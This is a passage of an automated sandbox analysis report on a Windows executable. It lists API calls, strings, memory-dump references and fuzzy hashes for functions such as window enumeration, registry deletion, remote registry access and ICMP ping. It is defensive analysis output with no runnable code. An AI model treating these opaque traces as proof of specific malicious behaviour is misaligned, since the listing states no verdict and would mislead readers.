                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,00000018,000000FF), ref: 00708641
                                                                                                                                                                                                                                                                • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00708671
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00708699
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007086AF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                • Opcode ID: bd0e34d7fe67fee954d1bf3dc07806171dc1f8214affd4601dd70fe6ccade01d
                                                                                                                                                                                                                                                                • Instruction ID: fef4db96f3d22c5dd1d29420dca76733941e1e89e767fbb7e12b8582f661bc8b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd0e34d7fe67fee954d1bf3dc07806171dc1f8214affd4601dd70fe6ccade01d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF414C71600208EFDB119FA5CC88EAE7BB8FF89715F108258F905E72A0DB399D01CB25
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 006F25D8
                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 006F25E8
                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 006F25F4
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 006F2601
                                                                                                                                                                                                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 006F266D
                                                                                                                                                                                                                                                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 006F26AC
                                                                                                                                                                                                                                                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 006F26D0
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 006F26D8
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 006F26E1
                                                                                                                                                                                                                                                                • DeleteDC.GDI32(?), ref: 006F26E8
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 006F26F3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                                                                • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                • Opcode ID: 3508ed248763b0d2bfaf22b712d1721f5315d5987177874a732b805db2b93e08
                                                                                                                                                                                                                                                                • Instruction ID: 54db8824486c2797e9829b2e7b455b45d54158bae1769e59836f914865038e97
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3508ed248763b0d2bfaf22b712d1721f5315d5987177874a732b805db2b93e08
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 596102B5D00219EFCF05CFA4D884AAEBBF6FF48310F208629EA55A7250D774A951CF54
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 006D4994
                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 006D49DA
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006D49EB
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 006D49F7
                                                                                                                                                                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 006D4A2C
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 006D4A64
                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 006D4A9D
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 006D4AE6
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 006D4B20
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 006D4B8B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                • Opcode ID: 2a97f58f14057c472e584355c894eff02500db627c4879966750a178325df52a
                                                                                                                                                                                                                                                                • Instruction ID: a98f9e25d6cf7a22c60696f235545f149ec19f354c600e9561211ab150df462c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a97f58f14057c472e584355c894eff02500db627c4879966750a178325df52a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E91DC318082059FDB05CF10C985BAA77EAFF94304F04856BFD8A9A296DF34ED45CBA1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 006FCC64
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 006FCC8D
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 006FCD48
                                                                                                                                                                                                                                                                  • Part of subcall function 006FCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 006FCCAA
                                                                                                                                                                                                                                                                  • Part of subcall function 006FCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 006FCCBD
                                                                                                                                                                                                                                                                  • Part of subcall function 006FCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006FCCCF
                                                                                                                                                                                                                                                                  • Part of subcall function 006FCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 006FCD05
                                                                                                                                                                                                                                                                  • Part of subcall function 006FCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 006FCD28
                                                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 006FCCF3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                • Opcode ID: f7674d3f8ee197b39b3cdfaa5254bbff9e690a10a737bc635b382cc58d56e17b
                                                                                                                                                                                                                                                                • Instruction ID: 447dacb32c4b7b5dc55ce00c400781d541affac7b0b29563d51eac4516926066
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f7674d3f8ee197b39b3cdfaa5254bbff9e690a10a737bc635b382cc58d56e17b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64318FB190112CFBDB218B50DD88EFFBB7DEF45760F004265BA06E2240DB349A45DAA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • timeGetTime.WINMM ref: 006DE6B4
                                                                                                                                                                                                                                                                  • Part of subcall function 0068E551: timeGetTime.WINMM(?,?,006DE6D4), ref: 0068E555
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 006DE6E1
                                                                                                                                                                                                                                                                • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 006DE705
                                                                                                                                                                                                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006DE727
                                                                                                                                                                                                                                                                • SetActiveWindow.USER32 ref: 006DE746
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006DE754
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 006DE773
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000000FA), ref: 006DE77E
                                                                                                                                                                                                                                                                • IsWindow.USER32 ref: 006DE78A
                                                                                                                                                                                                                                                                • EndDialog.USER32(00000000), ref: 006DE79B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                • String ID: BUTTON
                                                                                                                                                                                                                                                                • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                • Opcode ID: 262f18fa949fe684f5aae555c054d75495ecfa1341515ff92f1469c0e097e107
                                                                                                                                                                                                                                                                • Instruction ID: 050a483cf642a69000bafb7abe46d150fe8b6c33a3453b5634a3619e15c583ae
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 262f18fa949fe684f5aae555c054d75495ecfa1341515ff92f1469c0e097e107
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD21C5B8740244EFEB116F20EC89E363B6AE756348F508627F405857A2DF7B9C11CA1D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00679CB3: _wcslen.LIBCMT ref: 00679CBD
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006DEA5D
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006DEA73
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006DEA84
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 006DEA96
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 006DEAA7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                • Opcode ID: 476e65c7ed42a4627f93ee45605f253c6f43f440b7114ccf25ff2635b5d3e1d7
                                                                                                                                                                                                                                                                • Instruction ID: 1436753c3632b2f9b69f81b0a54a1e02250c22f4f3f7e8b10628e3fbd05cbe9c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 476e65c7ed42a4627f93ee45605f253c6f43f440b7114ccf25ff2635b5d3e1d7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B11A371A90269B9E720F7A1DC4AEFF6B7DEBD1B00F04842E7415A61D1EE701905C5B0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00688F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00688BE8,?,00000000,?,?,?,?,00688BBA,00000000,?), ref: 00688FC5
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00688C81
                                                                                                                                                                                                                                                                • KillTimer.USER32(00000000,?,?,?,?,00688BBA,00000000,?), ref: 00688D1B
                                                                                                                                                                                                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 006C6973
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00688BBA,00000000,?), ref: 006C69A1
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00688BBA,00000000,?), ref: 006C69B8
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00688BBA,00000000), ref: 006C69D4
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 006C69E6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 641708696-0
                                                                                                                                                                                                                                                                • Opcode ID: aaf47ed9c6cc6f320251c6b64ddc872e59e06962512f3fb33fec506f31cb1681
                                                                                                                                                                                                                                                                • Instruction ID: 1ca89b431d50c5069f4d831457f0a260187e184a06f5488fdec6be964d5a07eb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aaf47ed9c6cc6f320251c6b64ddc872e59e06962512f3fb33fec506f31cb1681
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB618A34502701DFDB22AF18DA48B6577F2FB41312F94861DE0429B6A4CB79B9C1CF98
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: .i
                                                                                                                                                                                                                                                                • API String ID: 0-2647164722
                                                                                                                                                                                                                                                                • Opcode ID: 1b14888ffa7fd3247c819b13f1829bcb15691249795c54fbf02785fbe466236f
                                                                                                                                                                                                                                                                • Instruction ID: 961b7e7fbb97fe650085df5b5cc1538ef016e3655e26618a537898f926b2ee69
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b14888ffa7fd3247c819b13f1829bcb15691249795c54fbf02785fbe466236f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ECC1BE74904249AFDF11EFA8C841BEDBBB6AF0A350F244199E914A7392CB349E41CF65
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00676B57: _wcslen.LIBCMT ref: 00676B6A
                                                                                                                                                                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006D07A2
                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006D07BE
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006D07DA
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 006D0804
                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 006D082C
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006D0837
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006D083C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                • Opcode ID: a9881d0144a0a05913e14e8e5d124ddd87658b370fac4669da6d6e9cfdd7caaf
                                                                                                                                                                                                                                                                • Instruction ID: 0ed36880d66cbd24368fc716ecac9dd041d006da39c4ec6a8097c00d51165bd1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9881d0144a0a05913e14e8e5d124ddd87658b370fac4669da6d6e9cfdd7caaf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08410A72C10229EBDF15EBA4DC95DEDB779BF44350F048229E905A72A1EB346E04CBA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 006F05BC
                                                                                                                                                                                                                                                                • inet_addr.WSOCK32(?), ref: 006F061C
                                                                                                                                                                                                                                                                • gethostbyname.WSOCK32(?), ref: 006F0628
                                                                                                                                                                                                                                                                • IcmpCreateFile.IPHLPAPI ref: 006F0636
                                                                                                                                                                                                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006F06C6
                                                                                                                                                                                                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006F06E5
                                                                                                                                                                                                                                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 006F07B9
                                                                                                                                                                                                                                                                • WSACleanup.WSOCK32 ref: 006F07BF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                • String ID: Ping
                                                                                                                                                                                                                                                                • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                • Opcode ID: f135db23b9c09591f1a365109053304a5281a2d4d809f0e26e3d156768c0c022
                                                                                                                                                                                                                                                                • Instruction ID: d1b404af06126d7a71fa56de53c2b067b551c47ffdcd0e2d3ac908411c2ffa36
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f135db23b9c09591f1a365109053304a5281a2d4d809f0e26e3d156768c0c022
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3918E75608205EFE720DF15C488F6ABBE2AF44318F1486A9F5698B7A2C774EC41CF91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                • Opcode ID: b61a649eb86b0846f53e913e0a36edb375c92a6729bcc895bbb516ab15cda69e
                                                                                                                                                                                                                                                                • Instruction ID: b0d4fb03cef16580cd8028ebff4218d2a3d975d9bd7987a602127c064e313e1b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b61a649eb86b0846f53e913e0a36edb375c92a6729bcc895bbb516ab15cda69e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B519E32A0451A9FCF24DF68C9518FEB7A7AF64320B2042A9E626E7385DB34DD41C790
